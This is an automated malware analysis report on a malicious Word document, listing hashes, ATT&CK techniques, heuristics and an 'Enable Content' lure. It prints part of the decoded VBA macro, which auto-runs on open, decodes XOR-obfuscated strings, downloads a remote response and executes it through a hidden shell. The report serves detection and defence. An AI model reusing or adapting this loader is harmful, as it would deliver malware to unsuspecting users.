Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 51685bf001412152…

MALICIOUS

Office (OLE)

Size: 555.5 KB
Created: 2018-06-21 08:14:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 4cc7a61b36f204b5fdff5f3a960e4d66
SHA-1: b7ffbfcaf0ad5ebf95411823bdb8ae9520991990
SHA-256: 51685bf0014121525552c12c2ec348baa4ccf894fe2ed2a41a05b1eaed385351
Risk Score: 230

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1140 Deobfuscate or Obfuscate Malicious Code

The sample contains a VBA macro that is obfuscated and designed to execute automatically upon opening the document. The macro uses CreateObject to instantiate objects and execute code, likely to download and run a secondary payload. The document body explicitly prompts the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass security measures.

Heuristics (8)

  • VBA macros detected (medium, 5 related findings): OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical): OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro (high): OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call (high): OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high): OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low): OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure (medium): SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info): EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9032 bytes
SHA-256: 084c459950290abb1f52d78e3d630732eb95b416c3c77546d5f4b25e957b6078
First 1,000 lines of the extracted script:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("xlBEuA").Value <> "toto" Then
mZClyKElqvdqDEZ
ActiveDocument.Variables("xlBEuA").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "itYTfsT"
Private Function bKCRAYmCSu(XKImQYIfgW As Variant, TcwjJtADLI As Integer)
Dim NUpTxVGQZx, jrweetPuqk As String, jzOldcsSJE, nUBEPnxOXM
jrweetPuqk = ActiveDocument.Variables("xlBEuA").Value()
NUpTxVGQZx = ""
jzOldcsSJE = 1
While jzOldcsSJE < UBound(XKImQYIfgW) + 2
nUBEPnxOXM = jzOldcsSJE Mod Len(jrweetPuqk): If nUBEPnxOXM = 0 Then nUBEPnxOXM = Len(jrweetPuqk)
NUpTxVGQZx = NUpTxVGQZx + Chr(Asc(Mid(jrweetPuqk, nUBEPnxOXM + TcwjJtADLI, 1)) Xor CInt(XKImQYIfgW(jzOldcsSJE - 1)))
jzOldcsSJE = jzOldcsSJE + 1
Wend
bKCRAYmCSu = NUpTxVGQZx
End Function
Function hDltTNWsfRqGKgo()
On Error Resume Next
Set TsK = CreateObject(bKCRAYmCSu(Array(52, 5, 90), 119) & bKCRAYmCSu(Array(4, 11, 63), 68) & bKCRAYmCSu(Array(65, 27, 55), 10) & bKCRAYmCSu(Array(2, 92, 84, 53), 93))
Set yaTom = CreateObject(bKCRAYmCSu(Array(4), 371) & bKCRAYmCSu(Array(6, 55), 634) & bKCRAYmCSu(Array(12, 125, 117, 84, 18, 27), 743) & bKCRAYmCSu(Array(8, 45, 22), 703) & bKCRAYmCSu(Array(14, 101, 72, 65, 107, 103), 381))
Randomize
yaTom.Open bKCRAYmCSu(Array(18, 40, 46), 142), bKCRAYmCSu(Array(5, 51, 69, 38, 112, 75, 109, 101, 67, 89, 23, 100, 4, 107, 68, 0, 72, 66, 96, 99, 120, _
2, 101), 769) & bKCRAYmCSu(Array(52, 17, 4, 4, 42, 99, 50, 41, 105, 69, 17, 102, 64), 792) & bKCRAYmCSu(Array(78, 10, 92), 378) & CLng(Rnd * 1000000), False
yaTom.Send
wuJXBrM = yaTom.responseText
wmmRTHk = bKCRAYmCSu(Array(24, 91, 47, 92, 30, 26, 7, 83, 25, 28, 122, 13, 33, 87, 21, 65, 2, 94, 23, 53, 81, _
48, 46, 22, 31, 91, 39, 25, 33, 33, 72), 314) & wuJXBrM
ret = TsK.Run(wmmRTHk, 0, True)
End Function
Function mZClyKElqvdqDEZ()
On Error GoTo Err2:
Dim DPtBkuPYn As String
Dim hLUzu As String
Call NGKyEMdedvPoWGe(rgnQFYiBtBIaqyL(), bKCRAYmCSu(Array(21, 16, 39, 51, 113, 17, 17, 54, 67, 46, 31, 47, 39, 62, 62), 643))
DPtBkuPYn = bKCRAYmCSu(Array(11, 0, 33, 120, 24, 52, 4, 24, 102, 54, 87, 90, 86, 5, 1, 71, 53, 16, 26, 6, 35, _
36), 159)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(2, 41, 33, 1, 20, 39, 30, 41), 345))
DPtBkuPYn = bKCRAYmCSu(Array(62, 18, 66, 91, 15, 44, 7, 37, 9, 122, 68, 92, 58, 84, 28, 32, 56, 109), 353)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(44, 89, 44, 10, 37, 83, 26, 60), 60))
DPtBkuPYn = bKCRAYmCSu(Array(13, 92, 24, 74, 2, 0, 42, 45, 15, 45, 86, 34, 65, 80, 92, 113, 0, 83, 71, 63, 88, _
32, 28, 87, 90, 125, 106, 13, 68, 87, 35, 47, 84, 25, 53, 36, 88, 68, 86, 71, 33, _
61, 15, 67, 39, 68, 117, 98, 97, 3, 93, 58, 25, 92, 119, 0, 13, 25, 67, 0, 14, _
8, 3, 63, 3, 81, 93, 85, 46, 90, 10, 85, 92, 52, 23, 25, 67, 23, 25, 59, 89, _
58, 27, 65, 44, 8, 30, 42, 25, 95, 23, 93, 109, 12, 12, 33, 32, 121, 122, 2, 3, _
54, 38, 71, 56, 96, 76, 124, 43, 23, 43, 50, 84, 23, 18, 95, 70, 9, 34, 2, 55, _
29, 6, 6, 50, 9, 29, 18, 85, 122, 32, 40, 46, 82, 91, 26, 29, 106, 106, 26, 2, _
17, 23, 64, 24, 17, 29, 26, 55, 4, 52, 15, 33, 84, 85, 118, 81, 60, 12, 18, 21, _
54, 86, 16, 55, 51, 45, 8, 23, 36, 80, 13, 26, 92, 38, 93, 78, 10, 17, 52, 101), 424)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(39, 41, 38, 85, 30, 51, 34, 57, 61, 53, 58), 732))
DPtBkuPYn = bKCRAYmCSu(Array(5, 50, 56, 85, 2, 28, 56, 119, 80, 35, 20, 6, 19, 117, 21, 13, 43, 83, 22, 57, 73, _
71, 7, 59, 94, 88, 50, 11, 61, 12, 3, 36, 22, 40, 15, 32, 0, 45), 264)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(58, 42, 18, 25, 11, 39, 46, 62, 40, 31, 3, 14, 53), 182))
Call hDltTNWsfRqGK
... (truncated)